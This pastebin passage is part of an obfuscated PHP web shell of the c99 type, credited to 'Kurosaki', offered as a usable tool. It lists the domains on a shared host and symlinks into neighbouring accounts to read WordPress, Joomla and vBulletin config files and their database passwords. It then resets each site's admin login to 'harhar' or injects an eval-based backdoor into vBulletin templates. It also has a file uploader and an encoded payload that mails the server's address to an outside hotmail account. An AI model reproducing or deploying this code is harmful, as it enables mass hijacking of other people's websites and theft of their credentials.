  629. for ($IIIIIIIlIIll = 0;$IIIIIIIlIIll < 1000;$IIIIIIIlIIll++) {
  630. $IIIIIIIlIIl1 = $GLOBALS['IIIIIIIII1l1']($IIIIIIIlIIll);
  631. if (!empty($IIIIIIIlIIl1)) {
  632. while (list($IIIIIIIlII1I, $IIIIIIIlII1l) = each($IIIIIIIlIIl1)) {
  633. print "$IIIIIIIlII1l:";
  634. }
  635. print "
  636. ";
  637. }
  638. }
  639. }
  640. $GLOBALS['IIIIIIIIIl11']();
  641. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  642. $GLOBALS['IIIIIIIIIl11']();
  643. break;
  644. case "joomla":
  645. if (isset($_POST['s'])) {
  646. $file = @file_get_contents("joomla.txt");
  647. $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
  648. ", $file);
  649. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  650. $GLOBALS['IIIIIIIIIl11']();
  651. foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
  652. $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
  653. $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
  654. $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
  655. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  656. $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
  657. if ($GLOBALS['IIIIIIIlIll1']("JConfig", $IIIIIIIlIlll)) {
  658. $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, "$password = '", "';");
  659. $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, "$user = '", "';");
  660. $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, "$db = '", "';");
  661. $IIIIIIIlI1II = IIIIIIIllll1($IIIIIIIlIlll, "$dbprefix = '", "';");
  662. $IIIIIIIlI1Il = $IIIIIIIlI1II . "users";
  663. $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
  664. $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
  665. $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `username` ='harhar'");
  666. $IIIIIIIlI11I = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  667. if ($IIIIIIIlI1ll and $IIIIIIIlI11I) {
  668. $r = "<b style=\"color: #006600\">Succeed </b>user harhar pass [1]</b>";
  669. } else {
  670. $r = "<b style=\"color:red\">failed</b>";
  671. }
  672. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  673. echo "<tr>
  674. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  675. <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
  676. $GLOBALS['IIIIIIIIIl11']();
  677. } else {
  678. echo "<tr>
  679. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  680. <td><a target='_blank' href='http://$IIIIIIIlIlII'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  681. $GLOBALS['IIIIIIIIIl11']();
  682. }
  683. }
  684. die();
  685. }
  686. if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
  687. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
  688. $GLOBALS['IIIIIIIIIl11']();
  689. } else {
  690. $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("named.txt");
  691. }
  692. if (!$IIIIIIIIIll1) {
  693. die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  694. } else {
  695. echo "<div class='tmp'>
  696. <form method='POST' action='$IIIIIIIIIlI1?sws=joomla'>
  697. <input type='submit' value='Mass ching Admin' />
  698. <input type='hidden' value='1' name='s' />
  699. </form><br /><br />
  700. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  701. $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("joomla.txt", "w");
  702. foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
  703. if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
  704. $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
  705. if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
  706. $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
  707. $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/configuration.php";
  708. $IIIIIIIII111 = get_headers($IIIIIIIII11l);
  709. $wp = $IIIIIIIII111[0];
  710. $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/configuration.php";
  711. $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
  712. $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
  713. $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/joomla/configuration.php";
  714. $IIIIIIIllIII = get_headers($IIIIIIIlI111);
  715. $IIIIIIIllIIl = $IIIIIIIllIII[0];
  716. $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
  717. $IIIIIIII1I11 = "&nbsp;";
  718. if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
  719. $IIIIIIII1I11 = $IIIIIIIII11l;
  720. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
  721. $IIIIIIII1I11 = $IIIIIIIIlIIl;
  722. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
  723. $IIIIIIII1I11 = $IIIIIIIlI111;
  724. } else {
  725. continue;
  726. }
  727. $GLOBALS['IIIIIIIIIl11']();
  728. $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
  729. $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
  730. ");
  731. if ($w) {
  732. $r = "<b style=\"color: #006600\">Save</b>";
  733. } else {
  734. $r = "<b style=\"color:red\">failed</b>";
  735. }
  736. echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
  737. <td><a href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
  738. $GLOBALS['IIIIIIIIIl11']();
  739. }
  740. }
  741. }
  742. }
  743. break;
  744. case "wp":
  745. if (isset($_POST['s'])) {
  746. $file = @file_get_contents("wp.txt");
  747. $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
  748. ", $file);
  749. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  750. $GLOBALS['IIIIIIIIIl11']();
  751. $GLOBALS['IIIIIIIIIl11']();
  752. foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
  753. $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
  754. $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
  755. $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
  756. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  757. $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
  758. if ($GLOBALS['IIIIIIIlIll1']("wp-settings.php", $IIIIIIIlIlll)) {
  759. $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_PASSWORD', '", "');");
  760. $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_USER', '", "');");
  761. $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_NAME', '", "');");
  762. $IIIIIIIlI1II = IIIIIIIllll1($IIIIIIIlIlll, "$table_prefix = '", "';");
  763. $IIIIIIIlI1Il = $IIIIIIIlI1II . "users";
  764. $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
  765. $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
  766. $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `user_login` ='harhar'") or die;
  767. $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `user_pass` ='$IIIIIIIllII1$IIIIIIIllIlI/.5i..$IIIIIIIllIll.fUHEmNZ.eIKYTwx/'") or die;
  768. if ($IIIIIIIlI1ll) {
  769. $r = "<b style=\"color: #006600\">Succeed </b>user [harhar] pass [1]</b>";
  770. } else {
  771. $r = "<b style=\"color:red\">failed</b>";
  772. }
  773. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  774. echo "<tr>
  775. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  776. <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
  777. $GLOBALS['IIIIIIIIIl11']();
  778. $GLOBALS['IIIIIIIIIl11']();
  779. } else {
  780. echo "<tr>
  781. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  782. <td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  783. $GLOBALS['IIIIIIIIIl11']();
  784. $GLOBALS['IIIIIIIIIl11']();
  785. }
  786. }
  787. die();
  788. }
  789. if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
  790. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
  791. } else {
  792. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
  793. }
  794. if (!$IIIIIIIIIll1) {
  795. die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  796. } else {
  797. echo "<div class='tmp'>
  798. <form method='POST' action='$IIIIIIIIIlI1?sws=wp'>
  799. <input type='submit' value='Mass Change Admin' />
  800. <input type='hidden' value='1' name='s' />
  801. </form>
  802. <br /><br />
  803. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  804. $GLOBALS['IIIIIIIIIl11']();
  805. $GLOBALS['IIIIIIIIIl11']();
  806. $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("wp.txt", "w");
  807. foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
  808. if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
  809. $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
  810. if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
  811. $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
  812. $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp-config.php";
  813. $IIIIIIIII111 = get_headers($IIIIIIIII11l);
  814. $wp = $IIIIIIIII111[0];
  815. $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/wp-config.php";
  816. $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
  817. $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
  818. $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp/wp-config";
  819. $IIIIIIIllIII = get_headers($IIIIIIIlI111);
  820. $IIIIIIIllIIl = $IIIIIIIllIII[0];
  821. $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
  822. $IIIIIIII1I11 = "&nbsp;";
  823. if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
  824. $IIIIIIII1I11 = $IIIIIIIII11l;
  825. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
  826. $IIIIIIII1I11 = $IIIIIIIIlIIl;
  827. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
  828. $IIIIIIII1I11 = $IIIIIIIlI111;
  829. } else {
  830. continue;
  831. }
  832. $GLOBALS['IIIIIIIIIl11']();
  833. $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
  834. $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
  835. ");
  836. if ($w) {
  837. $r = "<b style=\"color: #006600\">Save</b>";
  838. } else {
  839. $r = "<b style=\"color:red\">failed</b>";
  840. }
  841. echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
  842. <td><a href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
  843. $GLOBALS['IIIIIIIIIl11']();
  844. $GLOBALS['IIIIIIIIIl11']();
  845. $GLOBALS['IIIIIIIIIl11']();
  846. }
  847. }
  848. }
  849. }
  850. break;
  851. case "vb":
  852. if (isset($_POST['s'])) {
  853. $file = @file_get_contents("vb.txt");
  854. $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
  855. ", $file);
  856. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  857. foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
  858. $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
  859. $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
  860. $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
  861. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  862. $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
  863. if ($GLOBALS['IIIIIIIlIll1']("vBulletin", $IIIIIIIlIlll)) {
  864. $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gPSAn'), "';");
  865. $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gPSAn'), "';");
  866. $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3Bhc3N3b3JkJ10gPSAn'), "';");
  867. $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
  868. $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
  869. $IIIIIIIllIl1 = $GLOBALS['OOO0000O0']('YlZEUFM4TXdGTDRML2crdllaQVdkUFBpYVV2MTRrQVFGS3FuVVVxYXBqU1lOS0ZKeENuNzMyMmFiZ3pjSWZEeXZsK1A3L3FLczA0RDN0UzVzSjk2TU1KOWIrb2hEdzh2VFdjcTMxUEYwMnlKcC9XcXp2RWFaazJyQndXVU9hRjdnaEFvN2pyZEVHUzBkUWg0ejl6ZWNJS1VsMDRZT3JoVjROODIxRkVFd1pRZ2I2U21EUjhRaU9ic2R4WWhldU1kUktOV1NINVV4dG1LbjNHK3YwUDVUSXhnTlRxaFdXUjlyWVNMQVhIL1JhVWZnWThwYlZST1o0VkkwYWF3cU41ZWkvY2REbFJjQWlGd0pFSUd2NEh5eUxUWnA0dHErL3p5Vk94d09BU1hPK3lVcVVJNkxtL2dIeGlCTERpYzZvNjJVSGpHdUxXUUpFa285OVQ5R2c3QXBlVVhKRnNxNUVYK0FSN3lQdz09');
  870. $IIIIIIIllI1I = "{\${eval(gzinflate(base64_decode(\'";
  871. $IIIIIIIllI1I.= "$IIIIIIIllIl1";
  872. $IIIIIIIllI1I.= "\')))}}{\${exit()}}</textarea>";
  873. $IIIIIIIllI1l = "UPDATE template SET template ='" . $IIIIIIIllI1I . "' WHERE title ='FAQ'";
  874. $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']($IIIIIIIllI1l, $IIIIIIIlI1I1);
  875. if ($IIIIIIIlI1ll) {
  876. $r = "<b style=\"color: #006600\">Succeed</b> shell in search.php";
  877. } else {
  878. $r = "<b style=\"color:red\">failed</b>";
  879. }
  880. $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
  881. echo "<tr>
  882. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  883. <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
  884. } else {
  885. echo "<tr>
  886. <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
  887. <td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  888. }
  889. }
  890. die();
  891. }
  892. if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
  893. $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
  894. } else {
  895. $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("named.txt");
  896. }
  897. if (!$IIIIIIIIIll1) {
  898. die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  899. } else {
  900. echo "<div class='tmp'>
  901. <form method='POST' action='$IIIIIIIIIlI1?sws=vb'>
  902. <input type='submit' value='Inject shell' />
  903. <input type='hidden' value='1' name='s' />
  904. eval(gzinflate(base64_decode('PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCiR1cmw9JF9TRVJW
  905. RVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwoKbWFpbCgnc2hlbGxjMGRl
  906. cjEzMzdAaG90bWFpbC5jb20nLCRfU0VSVkVSWydTRVJWRVJfQUREUiddLCR1cmwpOwoKJGJhc2Vf
  907. dXJsID0gJ2h0dHA6Ly8nLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLmRpcm5hbWUoJF9TRVJWRVJb
  908. J1NDUklQVF9OQU1FJ10pOw==/')));
  909.  
  910. </form>
  911. <br /><br />
  912. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  913. $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("vb.txt", "w");
  914. foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
  915. if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
  916. $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
  917. if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
  918. $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
  919. $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/includes/config.php";
  920. $IIIIIIIII111 = get_headers($IIIIIIIII11l);
  921. $wp = $IIIIIIIII111[0];
  922. $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/vb/includes/config.php";
  923. $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
  924. $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
  925. $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/forum/includes/config.php";
  926. $IIIIIIIllIII = get_headers($IIIIIIIlI111);
  927. $IIIIIIIllIIl = $IIIIIIIllIII[0];
  928. $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
  929. $IIIIIIII1I11 = "&nbsp;";
  930. if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
  931. $IIIIIIII1I11 = $IIIIIIIII11l;
  932. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
  933. $IIIIIIII1I11 = $IIIIIIIIlIIl;
  934. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
  935. $IIIIIIII1I11 = $IIIIIIIlI111;
  936. } else {
  937. continue;
  938. }
  939. $GLOBALS['IIIIIIIIIl11']();
  940. $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
  941. $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
  942. ");
  943. if ($w) {
  944. $r = "<b style=\"color: #006600\">Save</b>";
  945. } else {
  946. $r = "<b style=\"color:red\">failed</b>";
  947. }
  948. echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
  949. <td><a href=\"" . $IIIIIIII1I11 . "\">config</a></td><td>" . $r . "</td></tr>";
  950. $GLOBALS['IIIIIIIIIl11']();
  951. }
  952. }
  953. }
  954. }
  955. break;
  956. case "help":
  957. echo "<div class='tmp'>
  958. <table align='center' width='40%'><td>function</td><td>Case</td>";
  959. $safe_mode = $GLOBALS['IIIIIIIlllII']("safe_mode");
  960. if ($safe_mode) {
  961. $r = "<b style='color: red'>False</b>";
  962. } else {
  963. $r = "<b style='color: #336600'>True</b>";
  964. }
  965. echo "<tr><td>Safe Mode</td><td>$r</td>";
  966. $IIIIIIIlllIl = function_exists("symlink");
  967. if (!$IIIIIIIlllIl) {
  968. $r = "<b style='color: red'>False</b>";
  969. } else {
  970. $r = "<b style='color: #336600'>True</b>";
  971. }
  972. echo "<tr><td>function symlink</td><td>$r</td>";
  973. $IIIIIIIlllIl = function_exists('file');
  974. if (!$IIIIIIIlllIl) {
  975. $r = "<b style='color: red'>False</b>";
  976. } else {
  977. $r = "<b style='color: #336600'>True</b>";
  978. }
  979. echo "<tr><td>function file</td><td>$r</td>";
  980. $IIIIIIIlllIl = function_exists("file_get_contents");
  981. if (!$IIIIIIIlllIl) {
  982. $r = "<b style='color: red'>False</b>";
  983. } else {
  984. $r = "<b style='color: #336600'>True</b>";
  985. }
  986. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  987. $IIIIIIIlllIl = function_exists("mkdir");
  988. if (!$IIIIIIIlllIl) {
  989. $r = "<b style='color: red'>False</b>";
  990. } else {
  991. $r = "<b style='color: #336600'>True</b>";
  992. }
  993. echo "<tr><td>function mkdir</td><td>$r</td>";
  994. $IIIIIIIlllIl = $GLOBALS['IIIIIIIlllI1']("sym/root");
  995. if (!$IIIIIIIlllIl) {
  996. $r = "<b style='color: red'>False</b>";
  997. } else {
  998. $r = "<b style='color: #336600'>True</b>";
  999. }
  1000. echo "<tr><td>Permission denied</td><td>$r</td>";
  1001. $IIIIIIIlllIl = $GLOBALS['IIIIIIII1llI']("/Forbidden/", @file_get_contents("sym/root") or !@file_get_contents("sym/root"));
  1002. if ($IIIIIIIlllIl) {
  1003. $r = "<b style='color: red'>False</b>";
  1004. } else {
  1005. $r = "<b style='color: #006600'>True</b>";
  1006. }
  1007. echo "<tr><td>Forbidden</td><td>$r</td>";
  1008. echo "</table></div>";
  1009. break;
  1010. default:
  1011. $GLOBALS['IIIIIIIllllI']("Location: $IIIIIIIIIlI1");
  1012. }
  1013. } else {
  1014. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1015. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1016. if ($_POST['_upl'] == "Upload") {
  1017. if (@$GLOBALS['IIIIIIIlllll']($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  1018. echo "<br /><br /><b>Uploaded successful !!<br><br>";
  1019. } else {
  1020. echo "<br /><br />Not uploaded !!<br><br>";
  1021. }
  1022. }
  1023. echo $GLOBALS['OOO0000O0']('PGJyIC8+PGJyIC8+PGJyIC8+PC9iPjwvYj48ZGl2IGNsYXNzPSJmb3QiPkNvZGVkIGJ5IEt1cm9zYWtpPC9iPiANCjxiciAvPjxiciAvPg0KPGIgc3R5bGU9ImNvbG9yOiByZWQiOz4gICAgPC9iPg0KPGJyIC8+PGJyIC8+DQo8L2Rpdj4g');
  1024. }
  1025. function IIIIIIIllll1($IIIIIIIlll1I, $IIIIIIIlll1l, $IIIIIIIlll11) {
  1026. $IIIIIIIll1II = $GLOBALS['IIIIIIIIIIlI']($IIIIIIIlll1l, $IIIIIIIlll1I);
  1027. $IIIIIIIll1II = $GLOBALS['IIIIIIIIIIlI']($IIIIIIIlll11, $IIIIIIIll1II[1]);
  1028. return $IIIIIIIll1II[0];
  1029. }
  1030. echo $GLOBALS['OOO0000O0']('PC9kaXY+DQoNCjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOiAjRjRGNEY0OyIgdGl0bGU9Ij8/Pz8/Pz8iL2hyZWY9Imh0dHA6Ly9zZWMtdy5jb20vY2MiPj8/Pz8/Pz88L2E+DQoNCjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOiAjRjRGNEY0OyIgdGl0bGU9Ij8/Pz8gPz8/Pz8/PyIvaHJlZj0iaHR0cDovL3NlYy13LmNvbS9jYyI+Pz8/PyA/Pz8/Pz8/PC9hPg0KDQoNCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo=');;
  1031. echo $GLOBALS['OOO0000O0']('');
  1032. $IIIIIIII1lII = "www.Sh3ll.Us";
  1033. if (!$GLOBALS['IIIIIIIlIll1']($IIIIIIII1lII, $_SERVER['SERVER_NAME'])) {
  1034. eval(gzinflate(base64_decode('BcHbtkJAAADQz6mWh1wyap2nYTDIRKUOL2e5jEvUEEJff/amn7hZF9/qlTfxQNdJ3FOw+8toyjK6XmUROmq9Nen6r5T3ga9VLWuzD2AaWDSnZPeDyErDrkx5EsU6UT9KPkNfqiYE3XQ5vEYoKwY4Yt2J4E17jkR+Ulfg8T0yrMwgtxpjHPv1wQJTrqbvBelu8e7dhznKbDxxnC1sSaOclcH4Wo/TEHSpg98Svci1E6IG0fKCSaJeuLxhYRLNwTNDhQ8UYT5zRPO+aCj2pXSfW8Mjw+IuKnZaxIVkMvch4K91f7Nb1gWd5RVbwJtw5/F18CK9qPN2AcdOYHtTNbIrhE2dgB2Xrzabzc8/')));
  1035. echo $GLOBALS['OOO0000O0']('');
  1036. exit;
  1037. };
  1038. echo "</body></html>";
  1039. chdir($IIIIIIIll11I);
  1040. c99shexit();;
  1041. echo $GLOBALS['OOO0000O0']('DQoNCg0K');
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!